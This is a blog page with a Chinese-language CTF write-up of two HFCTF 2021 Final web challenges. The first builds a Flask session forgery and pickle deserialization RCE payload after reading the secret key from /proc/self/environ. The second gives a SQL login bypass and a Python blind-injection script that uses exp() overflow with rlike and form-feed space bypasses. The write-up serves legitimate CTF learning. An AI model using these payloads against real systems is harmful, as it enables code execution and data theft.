<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"nama769.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="easyflask进题目后先看到&#x2F;file?file&#x3D;index.js很容易得到Here is a js file. Source at &#x2F;app&#x2F;source。然后应该&#x2F;file?file&#x3D;&#x2F;app&#x2F;source得到源码。但我可能脑子有问题吧，一直试&#x2F;file?file&#x3D;&#x2F;app&#x2F;source&#x2F;index.js 结果什么都没有，最后果然卡死在第一步 : ) 。 在Kagami哥哥的帮助下，终于得">
<meta property="og:type" content="article">
<meta property="og:title" content="HFCTF 2021 Finalweb">
<meta property="og:url" content="https://nama769.github.io/2021/05/01/[HFCTF%202021%20Final]web/index.html">
<meta property="og:site_name" content="zhblog">
<meta property="og:description" content="easyflask进题目后先看到&#x2F;file?file&#x3D;index.js很容易得到Here is a js file. Source at &#x2F;app&#x2F;source。然后应该&#x2F;file?file&#x3D;&#x2F;app&#x2F;source得到源码。但我可能脑子有问题吧，一直试&#x2F;file?file&#x3D;&#x2F;app&#x2F;source&#x2F;index.js 结果什么都没有，最后果然卡死在第一步 : ) 。 在Kagami哥哥的帮助下，终于得">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://nama769.github.io/2021/05/01/%5BHFCTF%202021%20Final%5Dweb/hatenum1.png">
<meta property="og:image" content="https://nama769.github.io/2021/05/01/%5BHFCTF%202021%20Final%5Dweb/hatenum2.png">
<meta property="article:published_time" content="2021-05-01T13:58:03.000Z">
<meta property="article:modified_time" content="2021-05-01T14:11:14.714Z">
<meta property="article:author" content="zhanghao">
<meta property="article:tag" content="ctfweb">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://nama769.github.io/2021/05/01/%5BHFCTF%202021%20Final%5Dweb/hatenum1.png">

<link rel="canonical" href="https://nama769.github.io/2021/05/01/[HFCTF%202021%20Final]web/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>HFCTF 2021 Finalweb | zhblog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">zhblog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">--ctf</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://nama769.github.io/2021/05/01/[HFCTF%202021%20Final]web/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="zhanghao">
      <meta itemprop="description" content="a v c">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zhblog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          HFCTF 2021 Finalweb
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-05-01 21:58:03 / 修改时间：22:11:14" itemprop="dateCreated datePublished" datetime="2021-05-01T21:58:03+08:00">2021-05-01</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index"><span itemprop="name">web</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="easyflask"><a href="#easyflask" class="headerlink" title="easyflask"></a>easyflask</h1><p>进题目后先看到<code>/file?file=index.js</code>很容易得到<code>Here is a js file. Source at /app/source</code>。然后应该<code>/file?file=/app/source</code>得到源码。但我可能脑子有问题吧，一直试<code>/file?file=/app/source/index.js</code> 结果什么都没有，最后果然卡死在第一步 : ) 。</p>
<p>在Kagami哥哥的帮助下，终于得到了源码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3.6</span></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64decode</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, render_template, session</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config[<span class="string">&quot;SECRET_KEY&quot;</span>] = <span class="string">&quot;*******&quot;</span></span><br><span class="line"></span><br><span class="line">User = <span class="built_in">type</span>(<span class="string">&#x27;User&#x27;</span>, (<span class="built_in">object</span>,), &#123;</span><br><span class="line">    <span class="string">&#x27;uname&#x27;</span>: <span class="string">&#x27;test&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;is_admin&#x27;</span>: <span class="number">0</span>,</span><br><span class="line">    <span class="string">&#x27;__repr__&#x27;</span>: <span class="keyword">lambda</span> o: o.uname,</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>, methods=(<span class="params"><span class="string">&#x27;GET&#x27;</span>,</span>)</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index_handler</span>():</span></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> session.get(<span class="string">&#x27;u&#x27;</span>):</span><br><span class="line">        u = pickle.dumps(User())</span><br><span class="line">        session[<span class="string">&#x27;u&#x27;</span>] = u</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;/file?file=index.js&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/file&#x27;</span>, methods=(<span class="params"><span class="string">&#x27;GET&#x27;</span>,</span>)</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">file_handler</span>():</span></span><br><span class="line">    path = request.args.get(<span class="string">&#x27;file&#x27;</span>)</span><br><span class="line">    path = os.path.join(<span class="string">&#x27;static&#x27;</span>, path)</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> os.path.exists(path) <span class="keyword">or</span> os.path.isdir(path) \</span><br><span class="line">            <span class="keyword">or</span> <span class="string">&#x27;.py&#x27;</span> <span class="keyword">in</span> path <span class="keyword">or</span> <span class="string">&#x27;.sh&#x27;</span> <span class="keyword">in</span> path <span class="keyword">or</span> <span class="string">&#x27;..&#x27;</span> <span class="keyword">in</span> path <span class="keyword">or</span> <span class="string">&quot;flag&quot;</span> <span class="keyword">in</span> path:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;disallowed&#x27;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(path, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> fp:</span><br><span class="line">        content = fp.read()</span><br><span class="line">    <span class="keyword">return</span> content</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/admin&#x27;</span>, methods=(<span class="params"><span class="string">&#x27;GET&#x27;</span>,</span>)</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">admin_handler</span>():</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        u = session.get(<span class="string">&#x27;u&#x27;</span>)</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">isinstance</span>(u, <span class="built_in">dict</span>):</span><br><span class="line">            u = b64decode(u.get(<span class="string">&#x27;b&#x27;</span>))</span><br><span class="line">        u = pickle.loads(u)</span><br><span class="line">    <span class="keyword">except</span> Exception:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;uhh?&#x27;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> u.is_admin == <span class="number">1</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;welcome, admin&#x27;</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;who are you?&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(<span class="string">&#x27;0.0.0.0&#x27;</span>, port=<span class="number">80</span>, debug=<span class="literal">False</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>知道了大概是python反序列化。下一步就是获得key。果然又卡住了。群友让我再看看源码，里面有个任意读取。再去看源码，确实有，但不会用。。。又再Kagami哥哥的帮助下，知道了linux的环境变量再<code>/proc/self/environ</code>里，得到<code>secret_key=glzjin22948575858jfjfjufirijidjitg3uiiuu</code></p>
<p>然后就是rce，一开始也是不会的，，但百度后还是明白了些。知道有个<code>__reduce__</code>方法，再对象被pickle时被调用。所以通过重写此方法，便可以rec。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span>:</span></span><br><span class="line">    uname = <span class="string">&#x27;123&#x27;</span></span><br><span class="line">    is_admin = <span class="number">1</span></span><br><span class="line">    __repr__ = <span class="keyword">lambda</span> o: o.uname</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span>(<span class="params">self</span>):</span></span><br><span class="line">        <span class="keyword">return</span> (<span class="built_in">eval</span>, (<span class="string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;echo `cat /flag ` &gt; /f1ag&#x27;).read()&quot;</span>,))</span><br></pre></td></tr></table></figure>

<p>然后再本地运行脚本，生成session。<code>.eJwtxksOgjAUAMCrmJ4AJJBAwqIQS_gZtUpLdzwSH5ha2Agi4e66cFazkhcJVrIDEhCkvKqQ_sVlnGR2I95WI9yPTueDkqqDjF9_96TtjyCjqTWXu1zQgFOanLszOJGGHo0SxwGWCOs9s9LYf0LCTJpQPPV0Ug_WqaUdC5PpWpyHXHGmWX4rMAzJtn0BiBswYw.YI07Bg.NkAe66dAOnYTZHn9l0D-Wsetbts</code>复制到题目中，访问/admin，报500错误，初步判断成功了。然后访问<code>/file?file=/f1ag</code>得到flag</p>
<h1 id="hatenum"><a href="#hatenum" class="headerlink" title="hatenum"></a>hatenum</h1><p>首先阅读源码,在config.php里看到一些重要的东西。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">sql_waf</span>(<span class="params"><span class="variable">$str</span></span>)</span>&#123;</span><br><span class="line">	<span class="keyword">if</span>(preg_match(<span class="string">&#x27;/union|select|or|and|\&#x27;|&quot;|sleep|benchmark|regexp|repeat|get_lock|count|=|&gt;|&lt;| |\*|,|;|\r|\n|\t|substr|right|left|mid/i&#x27;</span>, <span class="variable">$str</span>))&#123;</span><br><span class="line">		<span class="keyword">die</span>(<span class="string">&#x27;Hack detected&#x27;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">num_waf</span>(<span class="params"><span class="variable">$str</span></span>)</span>&#123;</span><br><span class="line">	<span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\d&#123;9&#125;|0x[0-9a-f]&#123;9&#125;/i&#x27;</span>,<span class="variable">$str</span>))&#123;</span><br><span class="line">		<span class="keyword">die</span>(<span class="string">&#x27;Huge num detected&#x27;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>很好，把我会的都过滤了，甚至过滤了一些我压根不会的。但仔细看还是有课利用的地方：例如<code>()</code>就没有过滤。结合login函数中这行代码，</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$res</span> = <span class="keyword">$this</span>-&gt;conn-&gt;query(<span class="string">&quot;select * from users where username=&#x27;<span class="subst">$username</span>&#x27; and password=&#x27;<span class="subst">$password</span>&#x27;&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>可以在username中输入转义符将引号转义，造成引号错误闭合。实现万能密码。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;username&quot;</span>: <span class="string">&quot;admin\\&quot;</span>,</span><br><span class="line"><span class="string">&quot;password&quot;</span>: <span class="string">&quot;||1#&quot;</span>,</span><br><span class="line"><span class="string">&quot;code&quot;</span>: <span class="string">&quot;1&quot;</span></span><br></pre></td></tr></table></figure>

<p>但还需要code才行。从Eki哥哥那里得到hint:<code>||1&amp;&amp;exp(709)#</code>刚看到的时候一脸懵逼，在本地试了一下后，明白了exp(710)会刚好造成溢出，女少口阿。又知道这道题和rlike有关</p>
<blockquote>
<p>然后我随着这个启发开启了一个智障的idea:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;username&quot;</span>: <span class="string">&quot;admin\\&quot;</span>,</span><br><span class="line">            <span class="string">&quot;password&quot;</span>: <span class="string">&quot;||i&amp;&amp;exp(999)#&quot;</span>,</span><br><span class="line">            <span class="string">&quot;code&quot;</span>: <span class="string">&quot;1&quot;</span></span><br></pre></td></tr></table></figure>

<p>由于执行exp(999)会溢出，再加上短路与。所以如果i=0,则不会报错，返回login fail;i=1,则造成溢出返回error。而事实确实如此。又学到rlike语句匹配返回1，否则返回0。心想这下成了！激动的把i换成rlike语句。却发现，笑死，根本不执行rlike语句，返回的全是error。</p>
<p>我的理解：在i处的rlike语句应该被执行了，但并不会将执行结果无缘无故的返回。</p>
</blockquote>
<p>再向Eki大佬求助，茅塞顿开：<code>||exp(710-(··· rlike ···))</code>突然就明白自己的为啥不行了。。</p>
<p>关于空格的绕过：</p>
<ul>
<li>/**/</li>
<li>通过加括号</li>
<li>将空格变成换页键（chr(0x0c)）,换行符,tab键 。</li>
</ul>
<p>这道题可以用chr(0x0c)。</p>
<p>再就是因为过滤了引号，所以要把字段转成十六进制。但题目对十六进制的长度进行了限制，天真的我一开始构造了一个<code>^.&#123;n&#125;x</code>想用这个把code爆出来。然而毫无疑问的超长了。题目限制的长度是4个十六进制数，那只能先简单爆一下前三位，然后再通过前3位爆第4位，再通过2，3，4位爆第5位······。但这种方法不100%可靠。事实也证明code也确实是精心构造的。</p>
<p>payload如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">str2hexnum</span>(<span class="params"><span class="built_in">str</span></span>):</span></span><br><span class="line">    hexhum=<span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">str</span>:</span><br><span class="line">        hexhum=hexhum+<span class="built_in">hex</span>(<span class="built_in">ord</span>(i))[<span class="number">2</span>:]</span><br><span class="line">    <span class="keyword">return</span> hexhum</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span>():</span></span><br><span class="line">    url = <span class="string">&quot;http://a5e30dc5-7f68-40fb-ba57-2bbb4b96ae79.node3.buuoj.cn/&quot;</span></span><br><span class="line">    hatelist=string.digits+string.ascii_uppercase+string.ascii_lowercase</span><br><span class="line">    <span class="comment">#0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</span></span><br><span class="line">    rel=<span class="string">&#x27;erg&#x27;</span></span><br><span class="line">    pay=<span class="string">&#x27;&#x27;</span></span><br><span class="line">    payload=<span class="string">&#x27;&#x27;</span></span><br><span class="line">    tem=<span class="string">&#x27;erg&#x27;</span></span><br><span class="line">    jud=<span class="string">&#x27;&#x27;</span></span><br><span class="line">    error=<span class="number">0</span></span><br><span class="line">    tag=<span class="literal">True</span></span><br><span class="line">    <span class="keyword">while</span>(tag):</span><br><span class="line">        jud=str2hexnum(tem)</span><br><span class="line">        error=<span class="number">0</span></span><br><span class="line">        <span class="keyword">for</span> p <span class="keyword">in</span> hatelist:</span><br><span class="line">            pay = str2hexnum(p)</span><br><span class="line">            payload=<span class="string">&quot;||exp(710-(code rlike binary 0x&quot;</span>+jud+pay+<span class="string">&quot;))#&quot;</span></span><br><span class="line">            payload=payload.replace(<span class="string">&#x27; &#x27;</span>,<span class="built_in">chr</span>(<span class="number">0x0c</span>))</span><br><span class="line">            data = &#123;</span><br><span class="line">                <span class="string">&quot;username&quot;</span>: <span class="string">&quot;admin\\&quot;</span>,</span><br><span class="line">                <span class="string">&quot;password&quot;</span>: payload,</span><br><span class="line">                <span class="string">&quot;code&quot;</span>: <span class="string">&quot;1&quot;</span></span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment"># print(data[&quot;password&quot;])</span></span><br><span class="line">            req = requests.post(url+<span class="string">&quot;/login.php&quot;</span>,data=data,allow_redirects=<span class="literal">False</span>)</span><br><span class="line">            <span class="built_in">print</span>(req.text)</span><br><span class="line">            <span class="keyword">if</span>(<span class="string">&#x27;fail&#x27;</span> <span class="keyword">in</span> req.text):</span><br><span class="line">                error = error + <span class="number">1</span></span><br><span class="line">                <span class="keyword">if</span> error &gt; <span class="number">1</span>:</span><br><span class="line">                    <span class="built_in">print</span>(<span class="string">&quot;more choices 1: &quot;</span> + rel+<span class="string">&#x27;\n2: &#x27;</span>+rel[:-<span class="number">1</span>]+p)</span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    rel=rel+p</span><br><span class="line">                    tem=tem[<span class="number">1</span>:]+p</span><br><span class="line">                    <span class="built_in">print</span>(rel)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">main()</span><br></pre></td></tr></table></figure>

<p>运行结果如下</p>
<img src="/2021/05/01/%5BHFCTF%202021%20Final%5Dweb/hatenum1.png" class="">

<p>可以看到code中应该又两个<code>gh2</code>一个后面是<code>3</code>，一个是<code>u</code>上图进行了<code>gh23</code>的情况。通过改变脚本中hatelist的字母和数字顺序，可以进行到<code>gh2u</code>的情况。如下图</p>
<img src="/2021/05/01/%5BHFCTF%202021%20Final%5Dweb/hatenum2.png" class="">

<p>可见这种情况陷入死循环，所以推断，<code>gh2u</code>在前，<code>gh23</code>在后</p>
<p>二者结合得到code:<code>erghruigh2uygh23uiu32ig</code></p>
<p>登录后拿到flag。</p>
<blockquote>
<p>我感觉我的登录方式有问题，在网站上登不上去。。。最后通过脚本得到cookie然后粘到网站，得到flag。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;http://a5e30dc5-7f68-40fb-ba57-2bbb4b96ae79.node3.buuoj.cn/&quot;</span></span><br><span class="line">data = &#123;</span><br><span class="line">                <span class="string">&quot;username&quot;</span>: <span class="string">&quot;admin\\&quot;</span>,</span><br><span class="line">                <span class="string">&quot;password&quot;</span>: <span class="string">&quot;||1#&quot;</span>,</span><br><span class="line">                <span class="string">&quot;code&quot;</span>: <span class="string">&quot;erghruigh2uygh23uiu32ig&quot;</span></span><br><span class="line">            &#125;</span><br><span class="line">req = requests.post(url+<span class="string">&quot;/login.php&quot;</span>,data=data,allow_redirects=<span class="literal">False</span>)</span><br><span class="line"><span class="built_in">print</span>(req.cookies)</span><br><span class="line"><span class="comment">#&lt;RequestsCookieJar[&lt;Cookie PHPSESSID=aiadnk9q961e9lskm9p1h0urlt for a5e30dc5-7f68-40fb-ba57-2bbb4b96ae79.node3.buuoj.cn/&gt;]&gt;</span></span><br></pre></td></tr></table></figure>
</blockquote>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/ctfweb/" rel="tag"># ctfweb</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/04/21/LaravelLearning/" rel="prev" title="LaravelLearning">
      <i class="fa fa-chevron-left"></i> LaravelLearning
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/06/14/%E7%BD%91%E7%AB%99%E6%BA%90%E7%A0%81/" rel="next" title="网站源码">
      网站源码 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#easyflask"><span class="nav-number">1.</span> <span class="nav-text">easyflask</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#hatenum"><span class="nav-number">2.</span> <span class="nav-text">hatenum</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">zhanghao</p>
  <div class="site-description" itemprop="description">a v c</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">15</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zhanghao</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

